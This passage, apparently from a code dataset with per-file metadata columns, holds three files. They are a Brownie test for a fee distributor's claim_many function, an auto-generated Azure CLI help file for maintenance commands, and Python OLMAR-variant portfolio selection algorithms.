    balances = [i.balance() for i in (alice, bob, charlie)]
    # Rewind the claim_many transaction, claim individually, and compare.
    chain.undo()
    fee_distributor.claim({"from": alice})
    fee_distributor.claim({"from": bob})
    fee_distributor.claim({"from": charlie})
    assert balances == [i.balance() for i in (alice, bob, charlie)]
def test_claim_many_with_burn(alice, bob, charlie, accounts, chain, voting_escrow, ve_rbn_rewards, fee_distributor, weth, token):
    """Same equivalence as test_claim_many, but the distributor is funded
    through the WETH burn() path instead of a raw ETH transfer."""
    amount = 1000 * 10 ** 18
    # Give each account tokens and an 8-week voting-escrow lock.
    for acct in (alice, bob, charlie):
        token.approve(voting_escrow, amount * 10, {"from": acct})
        token.transfer(acct, amount, {"from": alice})
        voting_escrow.create_lock(amount, chain.time() + 8 * WEEK, {"from": acct})
    chain.sleep(WEEK)
    chain.mine()
    start_time = int(chain.time())
    chain.sleep(WEEK * 5)
    fee_distributor = fee_distributor(t=start_time)
    # Fund via WETH: wrap 10 ETH, approve the distributor, and burn —
    # the distributor should end up holding the 10 ETH equivalent.
    weth.deposit({"from": accounts[3], "value": 10 * 10 ** 18})
    weth.approve(fee_distributor, 10 * 10 ** 18, {"from": accounts[3]})
    fee_distributor.burn(weth, 10 * 10 ** 18, {"from": accounts[3]})
    assert fee_distributor.balance() == 10 * 10 ** 18
    fee_distributor.checkpoint_token()
    chain.sleep(WEEK)
    fee_distributor.checkpoint_token()
    # Pad the fixed-size claim_many argument to 20 entries.
    fee_distributor.claim_many([alice, bob, charlie] + [ZERO_ADDRESS] * 17, {"from": alice})
    balances = [i.balance() for i in (alice, bob, charlie)]
    # Rewind claim_many, claim individually, and compare final balances.
    chain.undo()
    fee_distributor.claim({"from": alice})
    fee_distributor.claim({"from": bob})
    fee_distributor.claim({"from": charlie})
    assert balances == [i.balance() for i in (alice, bob, charlie)]
def test_claim_many_same_account(
    alice, bob, charlie, accounts, chain, voting_escrow, ve_rbn_rewards, fee_distributor, weth, token
):
    """Repeating the same account in claim_many must pay out only once
    (alice's balance rises by a single claim amount)."""
    amount = 1000 * 10 ** 18
    # Give each account tokens and an 8-week voting-escrow lock.
    for acct in (alice, bob, charlie):
        token.approve(voting_escrow, amount * 10, {"from": acct})
        token.transfer(acct, amount, {"from": alice})
        voting_escrow.create_lock(amount, chain.time() + 8 * WEEK, {"from": acct})
    chain.sleep(WEEK)
    chain.mine()
    start_time = int(chain.time())
    chain.sleep(WEEK * 5)
    fee_distributor = fee_distributor(t=start_time)
    accounts[3].transfer(fee_distributor, "10 ether")
    fee_distributor.checkpoint_token()
    chain.sleep(WEEK)
    fee_distributor.checkpoint_token()
    # claim.call is a static (dry-run) call: it returns the claim amount
    # without mutating state, so `expected` = one payout + current balance.
    expected = fee_distributor.claim.call({"from": alice}) + alice.balance()
    fee_distributor.claim_many([alice] * 20, {"from": alice})
    assert alice.balance() == expected
| 34.552083
| 129
| 0.664757
| 434
| 3,317
| 4.90553
| 0.145161
| 0.197276
| 0.084547
| 0.055895
| 0.874119
| 0.85674
| 0.838892
| 0.838892
| 0.838892
| 0.838892
| 0
| 0.030033
| 0.186916
| 3,317
| 95
| 130
| 34.915789
| 0.759362
| 0
| 0
| 0.797101
| 0
| 0
| 0.032861
| 0
| 0
| 0
| 0
| 0
| 0.057971
| 1
| 0.043478
| false
| 0
| 0.014493
| 0
| 0.057971
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
0d6b495fd8ebea52a3588660151f8a20c01b89c7
| 14,962
|
py
|
Python
|
src/maintenance/azext_maintenance/generated/_help.py
|
haroonf/azure-cli-extensions
|
61c044d34c224372f186934fa7c9313f1cd3a525
|
[
"MIT"
] | 207
|
2017-11-29T06:59:41.000Z
|
2022-03-31T10:00:53.000Z
|
src/maintenance/azext_maintenance/generated/_help.py
|
haroonf/azure-cli-extensions
|
61c044d34c224372f186934fa7c9313f1cd3a525
|
[
"MIT"
] | 4,061
|
2017-10-27T23:19:56.000Z
|
2022-03-31T23:18:30.000Z
|
src/maintenance/azext_maintenance/generated/_help.py
|
haroonf/azure-cli-extensions
|
61c044d34c224372f186934fa7c9313f1cd3a525
|
[
"MIT"
] | 802
|
2017-10-11T17:36:26.000Z
|
2022-03-31T22:24:32.000Z
|
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
#
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
# --------------------------------------------------------------------------
# pylint: disable=too-many-lines
from knack.help_files import helps
# CLI help text for the `az maintenance` extension: each `helps` entry maps a
# command path to a YAML document (type, short-summary, examples). Generated
# by AutoRest — edits here are lost on regeneration.
helps['maintenance'] = '''
type: group
short-summary: Manage Maintenance
'''
# --- public maintenance configurations ---------------------------------------
helps['maintenance public-configuration'] = """
type: group
short-summary: Manage public maintenance configuration with maintenance
"""
helps['maintenance public-configuration list'] = """
type: command
short-summary: "Get Public Maintenance Configuration records."
examples:
- name: PublicMaintenanceConfigurations_List
text: |-
az maintenance public-configuration list
"""
helps['maintenance public-configuration show'] = """
type: command
short-summary: "Get Public Maintenance Configuration record."
examples:
- name: PublicMaintenanceConfigurations_GetForResource
text: |-
az maintenance public-configuration show --resource-name "configuration1"
"""
# --- apply-update operations --------------------------------------------------
helps['maintenance applyupdate'] = """
type: group
short-summary: Manage apply update with maintenance
"""
helps['maintenance applyupdate list'] = """
type: command
short-summary: "Get Configuration records within a subscription."
examples:
- name: ApplyUpdates_List
text: |-
az maintenance applyupdate list
"""
helps['maintenance applyupdate show'] = """
type: command
short-summary: "Track maintenance updates to resource."
examples:
- name: ApplyUpdates_Get
text: |-
az maintenance applyupdate show --name "e9b9685d-78e4-44c4-a81c-64a14f9b87b6" --provider-name \
"Microsoft.Compute" --resource-group "examplerg" --resource-name "smdtest1" --resource-type "virtualMachineScaleSets"
"""
helps['maintenance applyupdate create'] = """
type: command
short-summary: "Apply maintenance updates to resource."
examples:
- name: ApplyUpdates_CreateOrUpdate
text: |-
az maintenance applyupdate create --provider-name "Microsoft.Compute" --resource-group "examplerg" \
--resource-name "smdtest1" --resource-type "virtualMachineScaleSets"
"""
helps['maintenance applyupdate update'] = """
type: command
short-summary: "Apply maintenance updates to resource."
"""
helps['maintenance applyupdate create-or-update-parent'] = """
type: command
short-summary: "Apply maintenance updates to resource with parent."
examples:
- name: ApplyUpdates_CreateOrUpdateParent
text: |-
az maintenance applyupdate create-or-update-parent --provider-name "Microsoft.Compute" --resource-group \
"examplerg" --resource-name "smdvm1" --resource-parent-name "smdtest1" --resource-parent-type \
"virtualMachineScaleSets" --resource-type "virtualMachines"
"""
helps['maintenance applyupdate show-parent'] = """
type: command
short-summary: "Track maintenance updates to resource with parent."
examples:
- name: ApplyUpdates_GetParent
text: |-
az maintenance applyupdate show-parent --name "e9b9685d-78e4-44c4-a81c-64a14f9b87b6" --provider-name \
"Microsoft.Compute" --resource-group "examplerg" --resource-name "smdvm1" --resource-parent-name "smdtest1" \
--resource-parent-type "virtualMachineScaleSets" --resource-type "virtualMachines"
"""
helps['maintenance applyupdate get-parent'] = """
type: command
short-summary: "Track maintenance updates to resource with parent."
examples:
- name: ApplyUpdates_GetParent
text: |-
az maintenance applyupdate get-parent --name "e9b9685d-78e4-44c4-a81c-64a14f9b87b6" --provider-name \
"Microsoft.Compute" --resource-group "examplerg" --resource-name "smdvm1" --resource-parent-name "smdtest1" \
--resource-parent-type "virtualMachineScaleSets" --resource-type "virtualMachines"
"""
# --- configuration assignments ------------------------------------------------
helps['maintenance assignment'] = """
type: group
short-summary: Manage configuration assignment with maintenance
"""
helps['maintenance assignment list'] = """
type: command
short-summary: "List configurationAssignments for resource."
examples:
- name: ConfigurationAssignments_List
text: |-
az maintenance assignment list --provider-name "Microsoft.Compute" --resource-group "examplerg" \
--resource-name "smdtest1" --resource-type "virtualMachineScaleSets"
"""
helps['maintenance assignment show'] = """
type: command
short-summary: "Get configuration for resource."
examples:
- name: ConfigurationAssignments_Get
text: |-
az maintenance assignment show --name "workervmConfiguration" --provider-name "Microsoft.Compute" \
--resource-group "examplerg" --resource-name "smdtest1" --resource-type "virtualMachineScaleSets"
"""
helps['maintenance assignment create'] = """
type: command
short-summary: "Register configuration for resource."
examples:
- name: ConfigurationAssignments_CreateOrUpdate
text: |-
az maintenance assignment create --maintenance-configuration-id "/subscriptions/5b4b650e-28b9-4790-b3ab-\
ddbd88d727c4/resourcegroups/examplerg/providers/Microsoft.Maintenance/maintenanceConfigurations/configuration1" --name \
"workervmConfiguration" --provider-name "Microsoft.Compute" --resource-group "examplerg" --resource-name "smdtest1" \
--resource-type "virtualMachineScaleSets"
"""
helps['maintenance assignment update'] = """
type: command
short-summary: "Register configuration for resource."
"""
helps['maintenance assignment delete'] = """
type: command
short-summary: "Unregister configuration for resource."
examples:
- name: ConfigurationAssignments_Delete
text: |-
az maintenance assignment delete --name "workervmConfiguration" --provider-name "Microsoft.Compute" \
--resource-group "examplerg" --resource-name "smdtest1" --resource-type "virtualMachineScaleSets"
"""
helps['maintenance assignment create-or-update-parent'] = """
type: command
short-summary: "Register configuration for resource."
examples:
- name: ConfigurationAssignments_CreateOrUpdateParent
text: |-
az maintenance assignment create-or-update-parent --maintenance-configuration-id \
"/subscriptions/5b4b650e-28b9-4790-b3ab-ddbd88d727c4/resourcegroups/examplerg/providers/Microsoft.Maintenance/maintenan\
ceConfigurations/policy1" --name "workervmPolicy" --provider-name "Microsoft.Compute" --resource-group "examplerg" \
--resource-name "smdvm1" --resource-parent-name "smdtest1" --resource-parent-type "virtualMachineScaleSets" \
--resource-type "virtualMachines"
"""
helps['maintenance assignment delete-parent'] = """
type: command
short-summary: "Unregister configuration for resource."
examples:
- name: ConfigurationAssignments_DeleteParent
text: |-
az maintenance assignment delete-parent --name "workervmConfiguration" --provider-name \
"Microsoft.Compute" --resource-group "examplerg" --resource-name "smdvm1" --resource-parent-name "smdtest1" \
--resource-parent-type "virtualMachineScaleSets" --resource-type "virtualMachines"
"""
helps['maintenance assignment list-parent'] = """
type: command
short-summary: "List configurationAssignments for resource."
examples:
- name: ConfigurationAssignments_ListParent
text: |-
az maintenance assignment list-parent --provider-name "Microsoft.Compute" --resource-group "examplerg" \
--resource-name "smdtestvm1" --resource-parent-name "smdtest1" --resource-parent-type "virtualMachineScaleSets" \
--resource-type "virtualMachines"
"""
helps['maintenance assignment show-parent'] = """
type: command
short-summary: "Get configuration for resource."
examples:
- name: ConfigurationAssignments_GetParent
text: |-
az maintenance assignment show-parent --name "workervmPolicy" --provider-name "Microsoft.Compute" \
--resource-group "examplerg" --resource-name "smdvm1" --resource-parent-name "smdtest1" --resource-parent-type \
"virtualMachineScaleSets" --resource-type "virtualMachines"
"""
# --- maintenance configurations -----------------------------------------------
helps['maintenance configuration'] = """
type: group
short-summary: Manage maintenance configuration with maintenance
"""
helps['maintenance configuration list'] = """
type: command
short-summary: "Get Configuration records within a subscription."
examples:
- name: MaintenanceConfigurations_List
text: |-
az maintenance configuration list
"""
helps['maintenance configuration show'] = """
type: command
short-summary: "Get Configuration record."
examples:
- name: MaintenanceConfigurations_GetForResource
text: |-
az maintenance configuration show --resource-group "examplerg" --resource-name "configuration1"
- name: MaintenanceConfigurations_GetForResource_GuestOSPatchLinux
text: |-
az maintenance configuration show --resource-group "examplerg" --resource-name "configuration1"
- name: MaintenanceConfigurations_GetForResource_GuestOSPatchWindows
text: |-
az maintenance configuration show --resource-group "examplerg" --resource-name "configuration1"
"""
helps['maintenance configuration create'] = """
type: command
short-summary: "Create configuration record."
parameters:
- name: --install-patches-windows-parameters --windows-parameters
short-summary: "Input parameters specific to patching a Windows machine. For Linux machines, do not pass this \
property."
long-summary: |
Usage: --install-patches-windows-parameters kb-numbers-to-exclude=XX kb-numbers-to-include=XX \
classifications-to-include=XX exclude-kbs-requiring-reboot=XX
kb-numbers-to-exclude: Windows KBID to be excluded for patching.
kb-numbers-to-include: Windows KBID to be included for patching.
classifications-to-include: Classification category of patches to be patched
exclude-kbs-requiring-reboot: Exclude patches which need reboot
- name: --install-patches-linux-parameters --linux-parameters
short-summary: "Input parameters specific to patching Linux machine. For Windows machines, do not pass this \
property."
long-summary: |
Usage: --install-patches-linux-parameters package-name-masks-to-exclude=XX package-name-masks-to-include=XX\
classifications-to-include=XX
package-name-masks-to-exclude: Package names to be excluded for patching.
package-name-masks-to-include: Package names to be included for patching.
classifications-to-include: Classification category of patches to be patched
examples:
- name: MaintenanceConfigurations_CreateOrUpdateForResource
text: |-
az maintenance configuration create --location "westus2" --maintenance-scope "OSImage" \
--maintenance-window-duration "05:00" --maintenance-window-expiration-date-time "9999-12-31 00:00" \
--maintenance-window-recur-every "Day" --maintenance-window-start-date-time "2020-04-30 08:00" \
--maintenance-window-time-zone "Pacific Standard Time" --namespace "Microsoft.Maintenance" --visibility "Custom" \
--resource-group "examplerg" --resource-name "configuration1"
"""
helps['maintenance configuration update'] = """
type: command
short-summary: "Patch configuration record."
parameters:
- name: --install-patches-windows-parameters --windows-parameters
short-summary: "Input parameters specific to patching a Windows machine. For Linux machines, do not pass this \
property."
long-summary: |
Usage: --install-patches-windows-parameters kb-numbers-to-exclude=XX kb-numbers-to-include=XX \
classifications-to-include=XX exclude-kbs-requiring-reboot=XX
kb-numbers-to-exclude: Windows KBID to be excluded for patching.
kb-numbers-to-include: Windows KBID to be included for patching.
classifications-to-include: Classification category of patches to be patched
exclude-kbs-requiring-reboot: Exclude patches which need reboot
- name: --install-patches-linux-parameters --linux-parameters
short-summary: "Input parameters specific to patching Linux machine. For Windows machines, do not pass this \
property."
long-summary: |
Usage: --install-patches-linux-parameters package-name-masks-to-exclude=XX package-name-masks-to-include=XX\
classifications-to-include=XX
package-name-masks-to-exclude: Package names to be excluded for patching.
package-name-masks-to-include: Package names to be included for patching.
classifications-to-include: Classification category of patches to be patched
examples:
- name: MaintenanceConfigurations_UpdateForResource
text: |-
az maintenance configuration update --location "westus2" --maintenance-scope "OSImage" \
--maintenance-window-duration "05:00" --maintenance-window-expiration-date-time "9999-12-31 00:00" \
--maintenance-window-recur-every "Month Third Sunday" --maintenance-window-start-date-time "2020-04-30 08:00" \
--maintenance-window-time-zone "Pacific Standard Time" --namespace "Microsoft.Maintenance" --visibility "Custom" \
--resource-group "examplerg" --resource-name "configuration1"
"""
helps['maintenance configuration delete'] = """
type: command
short-summary: "Delete Configuration record."
examples:
- name: MaintenanceConfigurations_DeleteForResource
text: |-
az maintenance configuration delete --resource-group "examplerg" --resource-name "example1"
"""
# --- update listings ----------------------------------------------------------
helps['maintenance update'] = """
type: group
short-summary: Manage update with maintenance
"""
helps['maintenance update list'] = """
type: command
short-summary: "Get updates to resources."
examples:
- name: Updates_List
text: |-
az maintenance update list --provider-name "Microsoft.Compute" --resource-group "examplerg" \
--resource-name "smdtest1" --resource-type "virtualMachineScaleSets"
"""
helps['maintenance update list-parent'] = """
type: command
short-summary: "Get updates to resources."
examples:
- name: Updates_ListParent
text: |-
az maintenance update list-parent --provider-name "Microsoft.Compute" --resource-group "examplerg" \
--resource-name "1" --resource-parent-name "smdtest1" --resource-parent-type "virtualMachineScaleSets" --resource-type \
"virtualMachines"
"""
| 43.242775
| 120
| 0.701912
| 1,496
| 14,962
| 7.001337
| 0.13369
| 0.040099
| 0.03819
| 0.054898
| 0.879225
| 0.793489
| 0.75864
| 0.743842
| 0.724652
| 0.69725
| 0
| 0.01551
| 0.176915
| 14,962
| 345
| 121
| 43.368116
| 0.834998
| 0.031413
| 0
| 0.644295
| 0
| 0.130872
| 0.95394
| 0.252676
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0.013423
| 0.003356
| 0
| 0.003356
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
21939c5323036a090c0bed78e9613687de8d3945
| 12,048
|
py
|
Python
|
online_classes.py
|
charlessutton/OLMAR
|
fb9e95083d4d7d568708d3025e2f23fd32271468
|
[
"MIT"
] | 8
|
2016-12-04T15:42:43.000Z
|
2021-06-17T19:20:53.000Z
|
online_classes.py
|
charlessutton/OLMAR
|
fb9e95083d4d7d568708d3025e2f23fd32271468
|
[
"MIT"
] | null | null | null |
online_classes.py
|
charlessutton/OLMAR
|
fb9e95083d4d7d568708d3025e2f23fd32271468
|
[
"MIT"
] | 6
|
2018-09-12T12:06:27.000Z
|
2021-10-12T20:59:39.000Z
|
from universal.algo import Algo
from universal import tools
import numpy as np
class OLRANDOM(Algo):
    """OLMAR-style strategy that predicts next-day price relatives by
    sampling one random day from the lookback window (deterministic via a
    fixed ``random_state``) and projecting the updated weights onto the
    simplex.

    Fix: the window error message previously said ">=3" while the check
    enforced ``window >= 2``; the message now matches the check. Dead
    commented-out code inside predict()'s docstring was removed.
    """

    PRICE_TYPE = 'raw'
    REPLACE_MISSING = True

    def __init__(self, window=5, eps=10):
        """
        :param window: Lookback window.
        :param eps: Constraint on return for new weights on last price (average of prices).
                    x * w >= eps for new weights w.
        :raises ValueError: if window < 2 or eps < 1.
        """
        super(OLRANDOM, self).__init__(min_history=window)
        # input check — messages match the bounds actually enforced
        if window < 2:
            raise ValueError('window parameter must be >=2')
        if eps < 1:
            raise ValueError('epsilon parameter must be >=1')
        self.window = window
        self.eps = eps

    def init_weights(self, m):
        # Start from the uniform portfolio over m assets.
        return np.ones(m) / m

    def step(self, x, last_b, history):
        # calculate return prediction from the trailing window only
        x_pred = self.predict(x, history.iloc[-self.window:])
        b = self.update(last_b, x_pred, self.eps)
        return b

    def predict(self, x, history):
        """Predict returns on next day by selecting one row of the window
        at random (fixed seed 123456 makes the draw reproducible).
        THIS IS OUR MAIN MODIFICATION.
        """
        x_pred = np.asanyarray(history.sample(random_state=123456)).reshape((history.shape[1]))
        return x_pred

    def update(self, b, x, eps):
        """Update portfolio weights to satisfy constraint b * x >= eps
        and minimize distance to previous weights."""
        x_mean = np.mean(x)
        lam = max(0., (eps - np.dot(b, x)) / np.linalg.norm(x - x_mean)**2)
        # limit lambda to avoid numerical problems
        lam = min(100000, lam)
        # update portfolio
        b = b + lam * (x - x_mean)
        # project it onto simplex
        return tools.simplex_proj(b)
class OLGAUSS(Algo):
    """OLMAR variant that predicts next-day price relatives as i.i.d. Gaussian
    draws centered at ``mu`` (seeded, so the prediction is reproducible)."""

    PRICE_TYPE = 'raw'
    REPLACE_MISSING = True

    def __init__(self, window=5, eps=10, mu=1, sigma=0.01):
        """
        :param window: Lookback window.
        :param eps: Constraint on return for new weights on last price (average of prices).
                    x * w >= eps for new weights w.
        :param mu: Mean of the Gaussian price-relative prediction.
        :param sigma: Std deviation of the Gaussian price-relative prediction.
        :raises ValueError: if window < 2 or eps < 1.
        """
        super(OLGAUSS, self).__init__(min_history=window)
        # input check -- message fixed to match the enforced bound (was '>=3')
        if window < 2:
            raise ValueError('window parameter must be >=2')
        if eps < 1:
            raise ValueError('epsilon parameter must be >=1')
        self.window = window
        self.eps = eps
        self.mu = mu
        self.sigma = sigma

    def init_weights(self, m):
        # start from the uniform portfolio over m assets
        return np.ones(m) / m

    def step(self, x, last_b, history):
        # predict next price relatives, then move weights toward the
        # prediction under the eps constraint
        x_pred = self.predict(x, history.iloc[-self.window:])
        b = self.update(last_b, x_pred, self.eps)
        return b

    def predict(self, x, history):
        """Predict the price relatives of the next day as a vector of
        Gaussians centered at ``mu``.
        THIS IS OUR MAIN MODIFICATION.
        """
        # NOTE(review): reseeds NumPy's *global* RNG on every call, so the
        # identical prediction vector is drawn each step -- confirm intended
        np.random.seed(123456)
        x_pred = np.random.normal(self.mu, self.sigma, history.shape[1]).reshape((history.shape[1]))
        return x_pred

    def update(self, b, x, eps):
        """Update portfolio weights to satisfy constraint b * x >= eps
        and minimize distance to previous weights."""
        x_mean = np.mean(x)
        lam = max(0., (eps - np.dot(b, x)) / np.linalg.norm(x - x_mean) ** 2)
        # limit lambda to avoid numerical problems
        lam = min(100000, lam)
        # update portfolio and project it back onto the simplex
        b = b + lam * (x - x_mean)
        return tools.simplex_proj(b)
class OLEWM(Algo):
    """OLMAR variant that predicts next-day price relatives from an
    exponentially weighted moving average (EWM) of past prices."""

    PRICE_TYPE = 'raw'
    REPLACE_MISSING = True

    def __init__(self, window=5, eps=10, alpha=0.6):
        """
        :param window: Lookback window.
        :param eps: Constraint on return for new weights on last price (average of prices).
                    x * w >= eps for new weights w.
        :param alpha: Smoothing factor of the exponentially weighted mean.
        :raises ValueError: if window < 2 or eps < 1.
        """
        super(OLEWM, self).__init__(min_history=window)
        # input check -- message fixed to match the enforced bound (was '>=3')
        if window < 2:
            raise ValueError('window parameter must be >=2')
        if eps < 1:
            raise ValueError('epsilon parameter must be >=1')
        self.window = window
        self.eps = eps
        self.alpha = alpha

    def init_weights(self, m):
        # start from the uniform portfolio over m assets
        return np.ones(m) / m

    def step(self, x, last_b, history):
        # predict next price relatives, then move weights toward the
        # prediction under the eps constraint
        x_pred = self.predict(x, history.iloc[-self.window:])
        b = self.update(last_b, x_pred, self.eps)
        return b

    def predict(self, x, history):
        """Predict returns on next day as the EWM of prices over the window,
        normalized by the current price.
        THIS IS OUR MAIN MODIFICATION.
        """
        # fixed: use the .iloc indexer directly; the original `.iloc()[-1]`
        # called the indexer object, which is deprecated/removed in modern pandas
        x_pred = np.asarray(history.ewm(alpha=self.alpha).mean().iloc[-1]).reshape(history.shape[1])
        return x_pred / x

    def update(self, b, x, eps):
        """Update portfolio weights to satisfy constraint b * x >= eps
        and minimize distance to previous weights."""
        x_mean = np.mean(x)
        lam = max(0., (eps - np.dot(b, x)) / np.linalg.norm(x - x_mean) ** 2)
        # limit lambda to avoid numerical problems
        lam = min(100000, lam)
        # update portfolio and project it back onto the simplex
        b = b + lam * (x - x_mean)
        return tools.simplex_proj(b)
class OLMEDIAN(Algo):
    """OLMAR variant that predicts next-day price relatives as the median of
    the window's price relatives (instead of the mean used by OLMAR)."""

    PRICE_TYPE = 'raw'
    REPLACE_MISSING = True

    def __init__(self, window=5, eps=10):
        """
        :param window: Lookback window.
        :param eps: Constraint on return for new weights on last price (average of prices).
                    x * w >= eps for new weights w.
        :raises ValueError: if window < 2 or eps < 1.
        """
        super(OLMEDIAN, self).__init__(min_history=window)
        # input check -- message fixed to match the enforced bound (was '>=3')
        if window < 2:
            raise ValueError('window parameter must be >=2')
        if eps < 1:
            raise ValueError('epsilon parameter must be >=1')
        self.window = window
        self.eps = eps

    def init_weights(self, m):
        # start from the uniform portfolio over m assets
        return np.ones(m) / m

    def step(self, x, last_b, history):
        # predict next price relatives, then move weights toward the
        # prediction under the eps constraint
        x_pred = self.predict(x, history.iloc[-self.window:])
        b = self.update(last_b, x_pred, self.eps)
        return b

    def predict(self, x, history):
        """Predict returns on next day as the per-asset median of the
        window's price relatives.
        THIS IS OUR MAIN MODIFICATION.
        """
        return (history / x).median()

    def update(self, b, x, eps):
        """Update portfolio weights to satisfy constraint b * x >= eps
        and minimize distance to previous weights."""
        x_mean = np.mean(x)
        lam = max(0., (eps - np.dot(b, x)) / np.linalg.norm(x - x_mean) ** 2)
        # limit lambda to avoid numerical problems
        lam = min(100000, lam)
        # update portfolio and project it back onto the simplex
        b = b + lam * (x - x_mean)
        return tools.simplex_proj(b)
class OLMAX(Algo):
    """OLMAR variant that predicts next-day price relatives as the per-asset
    maximum of the window's price relatives (optimistic prediction)."""

    PRICE_TYPE = 'raw'
    REPLACE_MISSING = True

    def __init__(self, window=5, eps=10):
        """
        :param window: Lookback window.
        :param eps: Constraint on return for new weights on last price (average of prices).
                    x * w >= eps for new weights w.
        :raises ValueError: if window < 2 or eps < 1.
        """
        super(OLMAX, self).__init__(min_history=window)
        # input check -- message fixed to match the enforced bound (was '>=3')
        if window < 2:
            raise ValueError('window parameter must be >=2')
        if eps < 1:
            raise ValueError('epsilon parameter must be >=1')
        self.window = window
        self.eps = eps

    def init_weights(self, m):
        # start from the uniform portfolio over m assets
        return np.ones(m) / m

    def step(self, x, last_b, history):
        # predict next price relatives, then move weights toward the
        # prediction under the eps constraint
        x_pred = self.predict(x, history.iloc[-self.window:])
        b = self.update(last_b, x_pred, self.eps)
        return b

    def predict(self, x, history):
        """Predict returns on next day as the per-asset maximum of the
        window's price relatives.
        THIS IS OUR MAIN MODIFICATION.
        """
        return (history / x).max()

    def update(self, b, x, eps):
        """Update portfolio weights to satisfy constraint b * x >= eps
        and minimize distance to previous weights."""
        x_mean = np.mean(x)
        lam = max(0., (eps - np.dot(b, x)) / np.linalg.norm(x - x_mean) ** 2)
        # limit lambda to avoid numerical problems
        lam = min(100000, lam)
        # update portfolio and project it back onto the simplex
        b = b + lam * (x - x_mean)
        return tools.simplex_proj(b)
class OLMIN(Algo):
    """OLMAR variant that predicts next-day price relatives as the per-asset
    minimum of the window's price relatives (pessimistic prediction)."""

    PRICE_TYPE = 'raw'
    REPLACE_MISSING = True

    def __init__(self, window=5, eps=10):
        """
        :param window: Lookback window.
        :param eps: Constraint on return for new weights on last price (average of prices).
                    x * w >= eps for new weights w.
        :raises ValueError: if window < 2 or eps < 1.
        """
        super(OLMIN, self).__init__(min_history=window)
        # input check -- message fixed to match the enforced bound (was '>=3')
        if window < 2:
            raise ValueError('window parameter must be >=2')
        if eps < 1:
            raise ValueError('epsilon parameter must be >=1')
        self.window = window
        self.eps = eps

    def init_weights(self, m):
        # start from the uniform portfolio over m assets
        return np.ones(m) / m

    def step(self, x, last_b, history):
        # predict next price relatives, then move weights toward the
        # prediction under the eps constraint
        x_pred = self.predict(x, history.iloc[-self.window:])
        b = self.update(last_b, x_pred, self.eps)
        return b

    def predict(self, x, history):
        """Predict returns on next day as the per-asset minimum of the
        window's price relatives.
        THIS IS OUR MAIN MODIFICATION.
        """
        return (history / x).min()

    def update(self, b, x, eps):
        """Update portfolio weights to satisfy constraint b * x >= eps
        and minimize distance to previous weights."""
        x_mean = np.mean(x)
        lam = max(0., (eps - np.dot(b, x)) / np.linalg.norm(x - x_mean) ** 2)
        # limit lambda to avoid numerical problems
        lam = min(100000, lam)
        # update portfolio and project it back onto the simplex
        b = b + lam * (x - x_mean)
        return tools.simplex_proj(b)
class OLMAR_max_k(Algo):
    """On-Line Portfolio Selection with Moving Average Reversion, modified
    to allocate equal weight to the top-k predicted assets.

    Reference:
        B. Li and S. C. H. Hoi.
        On-line portfolio selection with moving average reversion, 2012.
        http://icml.cc/2012/papers/168.pdf
    """
    PRICE_TYPE = 'raw'
    REPLACE_MISSING = True

    def __init__(self, window=5, eps=10, k=1):
        """
        :param window: Lookback window.
        :param eps: Constraint on return for new weights on last price (average of prices).
                    x * w >= eps for new weights w.
        :param k: Number of top-predicted assets that receive (equal) weight.
        :raises ValueError: if window < 2 or eps < 1.
        """
        super(OLMAR_max_k, self).__init__(min_history=window)
        # input check -- message fixed to match the enforced bound (was '>=3')
        if window < 2:
            raise ValueError('window parameter must be >=2')
        if eps < 1:
            raise ValueError('epsilon parameter must be >=1')
        self.window = window
        self.eps = eps
        self.k = k

    def init_weights(self, m):
        # start from the uniform portfolio over m assets
        return np.ones(m) / m

    def step(self, x, last_b, history):
        # predict next price relatives, then rebuild the portfolio
        x_pred = self.predict(x, history.iloc[-self.window:])
        b = self.update(last_b, x_pred, self.eps)
        return b

    def predict(self, x, history):
        """ Predict returns on next day (moving average of price relatives). """
        return (history / x).mean()

    def update(self, b, x, eps):
        """Allocate equal weight to the k assets with the highest predicted
        return.

        NOTE: unlike classic OLMAR, ``b`` and ``eps`` are ignored here -- the
        portfolio is rebuilt from scratch at every step.
        """
        x = np.asarray(x)
        # indices of the k largest predicted returns
        top_k = np.argsort(x)[::-1][:self.k]
        allocation = np.zeros(len(x))
        allocation[top_k] = 1.0
        # normalize so weights sum to 1 (handles k > number of assets too)
        return allocation / np.sum(allocation)
| 28.617577
| 102
| 0.567065
| 1,593
| 12,048
| 4.190207
| 0.100439
| 0.00809
| 0.027266
| 0.019925
| 0.87985
| 0.87236
| 0.87236
| 0.87236
| 0.852434
| 0.852434
| 0
| 0.018914
| 0.324203
| 12,048
| 420
| 103
| 28.685714
| 0.800909
| 0.304283
| 0
| 0.795699
| 0
| 0
| 0.054631
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.188172
| false
| 0
| 0.016129
| 0.037634
| 0.467742
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
21a43b152a39b55399cd0af03e1d78a9c938830a
| 17,145
|
py
|
Python
|
nautobot_device_lifecycle_mgmt/navigation.py
|
networktocode-llc/nautobot-plugin-device-lifecycle-mgmt
|
b960a61f8169bcc6667b4e648db4616686e188a0
|
[
"Apache-2.0"
] | null | null | null |
nautobot_device_lifecycle_mgmt/navigation.py
|
networktocode-llc/nautobot-plugin-device-lifecycle-mgmt
|
b960a61f8169bcc6667b4e648db4616686e188a0
|
[
"Apache-2.0"
] | null | null | null |
nautobot_device_lifecycle_mgmt/navigation.py
|
